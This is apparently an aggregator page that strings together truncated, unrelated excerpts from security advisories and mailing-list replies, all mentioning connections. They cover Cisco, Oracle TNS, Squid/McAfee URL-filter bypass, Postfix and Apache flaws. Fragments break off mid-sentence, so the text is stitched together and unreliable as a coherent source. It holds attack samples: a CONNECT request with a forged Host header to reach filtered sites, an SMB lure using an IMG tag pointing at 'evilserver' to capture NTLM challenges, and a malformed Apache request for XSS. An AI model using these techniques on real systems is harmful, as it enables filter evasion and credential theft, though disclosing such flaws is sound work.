
connection

Cisco Security Advisory: Multiple Vulnerabilities in Cisco Unity Connection


Cisco Security Advisory: Multiple Vulnerabilities in Cisco Unity Connection

Advisory ID: cisco-sa-20120229-cuc

Revision 1.0

For Public Release 2012 February 29 16:00 UTC (GMT)

RE: Squid URL Filtering Bypass

To be clear, the CONNECT request is a single request/response cycle  between the client and the proxy.  Any request body is nonsensical and should be ignored by the proxy (or the request can be rejected if the proxy wants to be pedantic).  There is nothing that explicitly disallows inclusion of the host header in a CONNECT request.  Granted, including the host header incurs some degree of ambiguity (the FQDN may resolve to the IP address, but the IP address is not guaranteed to resolve to the FQDN), but this is clearly a debatable choice on the developer's part as to whether it should be used to determine traffic policy applicability for this request.

The proxy should only ignore further data between the client and remote if the proxy successfully established a TCP connection between them on the specified destination port.
IOW, if the client sends a CONNECT request that the proxy policy allows, the proxy should either queue or reject further communication from the client until the TCP connection has been successfully established and the proxy has responded to the client with "HTTP 200".
If the connection attempt fails, the proxy should provide an HTTP error response to the client and close the client-to-proxy connection.

Likewise, while the proxy does establish the end-to-end TCP connection between the client and upstream server, it is not responsible for any part of the encryption that may be involved in that communication - unless it specifically offers a "trusted MitM" feature such as TMG HTTPS Inspection or Juniper SSL Forward Proxy (other vendors have similar features).

Also, whether the McAfee proxy allows translating normal HTTP methods to CONNECT, then tunneling them to the upstream proxy is irrelevant to the question of whether the local proxy actually uses the host header or the host portion of the CONNECT request to determine policy applicability.


[ADVISORY] NetCache URL DoS - Argentinian ISP

inaccessible by means of the prefetch cache control directive.

The procedure is very simple, sending several times a simple GET
HTTP/1.1 request to the victim URL will make the proxies no longer
serve it. Users will be waiting for about two minutes and then the TCP
connection will be closed, which depending on the user agent it will
be interpreted as a valid zero-length HTTP 0.9 reply or an error.

It is worth noting that this attack affects the URL EXACTLY. For
instance, attacking http://www.google.com/ will not block
http://www.google.com./ (notice the dot before the last slash), nor

Cisco Security Advisory: Multiple Vulnerabilities in Cisco ASA 5500 Series Adaptive Security Appliances


Cisco ASA 5500 Series Adaptive Security Appliances are affected by the
following vulnerabilities:

  * TCP Connection Exhaustion Denial of Service Vulnerability
  * Session Initiation Protocol (SIP) Inspection Denial of Service
    Vulnerabilities
  * Skinny Client Control Protocol (SCCP) Inspection Denial of
    Service Vulnerability
  * WebVPN Datagram Transport Layer Security (DTLS) Denial of Service

The history of a -probably- 13 years old Oracle bug: TNS Poison

to the latest one (Oracle 11g) without the CPU-APR-2012. The bug was
reported to Oracle in 2008 so it "only" took them 4 years to fix the
vulnerability since reported.

The vulnerability I called TNS Poison affects the component called TNS
Listener, which is responsible for connection establishment. To
exploit the vulnerability no privilege is needed, just network access to
the TNS Listener. The “feature” exploited is enabled by default in all
Oracle versions starting with Oracle 8i and ending with Oracle 11g
(without CPU-APR-2012).


Cisco Security Advisory: Cisco IOS Software TCP Denial of Service Vulnerability

Summary
=======

Cisco IOS Software Release, 15.1(2)T is affected by a denial of
service (DoS) vulnerability during the TCP establishment phase. The
vulnerability could cause embryonic TCP connections to remain in a
SYNRCVD or SYNSENT state. Enough embryonic TCP connections in these
states could consume system resources and prevent an affected device
from accepting or initiating new TCP connections, including any
TCP-based remote management access to the device.


RE: McAfee Web Gateway URL Filtering Bypass

??

I'm unclear - exactly how does an ICMP echo cycle have anything to do with the apparent disparity between the host portion of the CONNECT URI and the contents of the host header?
I can see the logic in :
1. comparing the HOST header to the host portion of the CONNECT URI 
2. resolving either to a name or IP address (depending on its original state) 
3. comparing the resolved results to each other (DNS RR records will be an interesting case)

The thing to bear in mind is that reverse resolution (IP-to-name) on the Internet tends to be flaky to the point of completely useless.
There are two main problems:

Re: Squid URL Filtering Bypass

In McAfee Web Gateway it is possible to convert GET methods into CONNECT
methods, and after the connection, send the same GET packet, without
modification and without cryptography. Even with the GET packets
passing through the proxy without cryptography and with the Host field
pointing to a filtered site, the proxy will accept it.
I think it is a vulnerability!
See my python code.

Thanks


Re: Squid URL Filtering Bypass

What I understand from the advisory is the Squid proxy is basing its
filtering on the Host header when present, even for the CONNECT
command which doesn't allow this header at all as it makes no sense. I
haven't confirmed the bug but what's being described is definitely a
vulnerability.

There's also a small misconception in what you said. The proxy will
see the entire CONNECT request, headers and all - after the request
headers there'll be a pair of newlines, and only *then* the remaining
data is tunneled transparently. So it's the second request's headers

Re: McAfee Web Gateway URL Filtering Bypass

Hello,

We might be able to fix this by simply doing a ping to the website
before connecting, so that the IP of the host specified matches the
connect field. In any case, the consistency of the host and connect is
indeed a big design flaw.

- Vikram

On Mon, Apr 16, 2012 at 6:12 PM, Gabriel Menezes Nunes

Re: Squid URL Filtering Bypass

A forward proxy server when presented with a CONNECT request is solely responsible for attempting to facilitate an end-to-end encrypted path between the requesting client and the far end server. The CONNECT method does no more than create a temporary hole in your firewall.

Only once that is done is a normal HTTP request, including headers such as the Host: header, passed over the encrypted path by the client. Most crucially, the proxy server cannot see the HTTP request or its headers due to the end-to-end encryption. You can use the encrypted path to carry any protocol or data you like and the proxy server is quite oblivious to it as it is opaque to the proxy.

The only access control that the proxy server can perform is based on the CONNECT method request and the server identified in it by either IP number or FQDN and port.

You do not say what the acl is that you have asked Squid to apply but it cannot involve any examination of the Host: header of a request if the CONNECT method is used; only the far end server can see that.

The same conclusion also applies to your other post about a vulnerability with "McAfee Web Gateway URL Filtering Bypass"


CVE-2008-2625: Oracle DBMS – Proxy Authentication Vulnerability

Oracle is a widely-deployed Database Management System (DBMS) that supports a variety of applications. Many multi-tier applications are designed to use proxy authentication, restricting a middle tier to establish the database connection on behalf of the users. The standard authentication mechanism requires the client, the middle tier in this case, to provide valid credentials in order to authenticate and connect to the DBMS. User sessions are then created through the proxy connection. Oracle TNS protocol messages are used for session setup, authentication and data transfer. 


Scope

Imperva’s Application Defense Center (ADC) conducts extensive research on enterprise applications and databases. During its research, the team has identified a vulnerability in Oracle’s proxy authentication and access control mechanism. 


Findings


McAfee Web Gateway URL Filtering Bypass

# CVE: CVE-2012-2212


I found a vulnerability in McAfee Web Gateway 7 that allows access to
filtered sites.
The appliance believes in the Host field of HTTP Header using CONNECT method.
Example

CONNECT 66.220.147.44:443 HTTP/1.1
Host: www.facebook.com


TCP/IP Orphaned Connections Vulnerability

Date: 09.09.2009
________________________________________________________________________

Vendor:                Microsoft Corporation
Product:               Microsoft Windows XP/Vista TCP/IP-Stack
Vulnerability:         TCP/IP Orphaned Connections Vulnerability
Affected Releases:     Windows Vista Business SP1/ Windows XP SP3
Severity:              Moderate
CVE:                   CVE-2009-1926
________________________________________________________________________


Ruby Net::HTTPS library does not validate server certificate CN

Vendor: Ruby
Vendor URL: http://www.ruby-lang.org
Versions affected: 1.8.5, 1.8.6, Trunk Ruby
Systems Affected: All Ruby Platforms
Severity: Medium - Compromise of SSL connection integrity
Author: Chris Clark <cclark[at]isecpartners[dot]com>

Vendor notified: Yes
Public release: Yes
Advisory URL: http://www.isecpartners.com/advisories/2007-006-rubyssl.txt

[security bulletin] HPSBMA02593 SSRT100237 rev.1 - HP Virtual Connect Enterprise Manager (VCEM) for Windows, Remote Arbitrary File Download

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c02550412
Version: 1

HPSBMA02593 SSRT100237 rev.1 - HP Virtual Connect Enterprise Manager (VCEM) for Windows, Remote Arbitrary File Download

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2010-10-21
Last Updated: 2010-10-21

Windows SMB NTLM Authentication Weak Nonce Vulnerability

exhaustive).

        Since this problem was also found on Windows versions as old as Windows
NT4, this scenario might still be possible.

        (ii) An attacker A connects to system S and sends multiple 'SMB
Negotiate Protocol Request' packets with the 'Flags2' field set to
0xc001 to obtain several challenges, and stores them. The attacker A
then forces a user U on system S to connect to his own specially crafted
SMB server, for example by sending an email with multiple <IMG> tags
with UNC links (e.g.: <IMG SRC=\\evilserver\share\a.jpg>) or a link to

Corrections about Squid/McAfee URL Filtering Bypass

All my research was made against a McAfee Web Gateway 7, and, after I
finished the proof of concept, I tested against Squid.
Both are vulnerable to SSL Translation Attack (converting hostnames to
IP). But Squid does not use the HOST field of HTTP protocol. But McAfee
uses it.
The latest default configuration of Squid blocks CONNECT methods for
all ports but 443. McAfee allows CONNECT for 80 and 443.
So the tests I made with the Host header work ONLY for McAfee Web Gateway
and the translation of GET methods to CONNECT methods will work ONLY
for McAfee, because Squid blocks CONNECT for port 80. But, if the
proxy allows this kind of connection, the proxy can be vulnerable (for

SEC Consult SA-20071204-0 :: SonicWALL Global VPN Client Format String Vulnerability

Vendor description:
---------------

The SonicWALL Global VPN Client provides mobile users with access to
mission-critical network resources by establishing secure connections to
their office network's IPSec-compliant SonicWALL VPN gateway.


Vulnerability overview:
---------------

Cisco Security Advisory: Cisco IOS SSL VPN Vulnerability

Cisco IOS  Software contains a vulnerability when the Cisco IOS SSL
VPN feature is configured with an HTTP redirect. Exploitation could
allow a remote, unauthenticated user to cause a memory leak on the
affected devices, that could result in a memory exhaustion condition
that may cause device reloads, the inability to service new TCP
connections, and other denial of service (DoS) conditions.

Cisco has released free software updates that address this
vulnerability. There is a workaround to mitigate this vulnerability.

This advisory is posted at 

Memory corruption in Postfix SMTP server Cyrus SASL support (CVE-2011-1720)

    of other methods are CRAM-MD5 or DIGEST-MD5.

    Example for the "port 25" service:

    $ telnet server.example.com 25
    Connected to server.example.com.
    Escape character is '^]'.
    220 server.example.com ESMTP Postfix
    ehlo client.example.com
    250-server.example.com
    250-PIPELINING

Squid URL Filtering Bypass

# Tested on: Squid Proxy 3.1.19
# CVE: CVE-2012-2213


I found a vulnerability in Squid Proxy that allows access to filtered sites.
The software believes in the Host field of HTTP Header using CONNECT method.
Example

CONNECT 66.220.147.44:443 HTTP/1.1
Host: www.facebook.com


Re: Squid URL Filtering Bypass

> # Tested on: Squid Proxy 3.1.19
> # CVE: CVE-2012-2213
>
>
> I found a vulnerability in Squid Proxy that allows access to filtered sites.
> The software believes in the Host field of HTTP Header using CONNECT method.
> Example
>
> CONNECT 66.220.147.44:443 HTTP/1.1
> Host: www.facebook.com
>

FortiGuard: URL Filtering Application Bypass Vulnerability

actually required to access a specific site on multi-homed web sites.
When no host header is used, the intended web site is actually not
displayed. Therefore, there is no risk.

Macula's Analysis: If you don't have some AV, HIPS, etc. properly
installed, through this vuln a workstation can connect to a malicious
"Hacking Site" and get infected. Also through this vuln, you can
connect to different porn sites without problems. And no matter if it's
multi-homed web sites or not. So we consider it's not a low risk.



Family Connections 1.8.2 Blind SQL Injection (Correct Version)

*******   Salvatore "drosophila" Fresta   *******

[+] Application: Family Connection
[+] Version: <= 1.8.2
[+] Website: http://www.familycms.com

[+] Bugs: [A] Blind SQL Injection

[+] Exploitation: Remote
[+] Date: 1 Apr 2009

Cisco Security Advisory: Cisco PIX and ASA Time-to-Live Vulnerability

decrement feature enabled are vulnerable.

By default the PIX and ASA security appliance software does not
decrement the TTL of transient packets. The ability to decrement the TTL
of transient packets can be enabled on a selective or global basis by
using the set connection decrement-ttl command in the policy-map class
configuration mode. To determine whether you are running this feature
use the show running-config command and search for the set connection
decrement-ttl command. Alternatively you can use the include argument to
search for this command as follows:


RE: Cisco Security Advisory: Cisco PIX and ASA Time-to-Live Vulnerability



PR07-37: XSS on Apache HTTP Server 413 error pages via malformed HTTP method

REQUEST:

GET / HTTP/1.1
Host: <BADCHARS>
Connection: close
Content-length: -1
[LF]
[LF]



SQL Injection and XSS vulnerabilities in CubeCart version 4.3.3

Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect: enabled
Cookie: PHPSESSID=7c970bfe00c50261d25166dbab43c294;
ccUser=7c970bfe00c50261d25166dbab43c294
Host: webapps7:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR
1.1.4322)

2. Cross-site Scripting vulnerability in

Mod_proxy from apache 1.3 - Integer overflow which causes heap overflow.

to overflow buffer on heap via integer overflow vulnerability.


   Description:

Mod_proxy implements a proxy/cache for Apache. It implements proxying capability for FTP, CONNECT (for SSL),
HTTP/0.9, HTTP/1.0, and (as of Apache 1.3.23) HTTP/1.1. The module can be configured to connect to other
proxy modules for these and other protocols.


   Details:


Copyright © 1995-2012 LinuxRocket.net. All rights reserved.
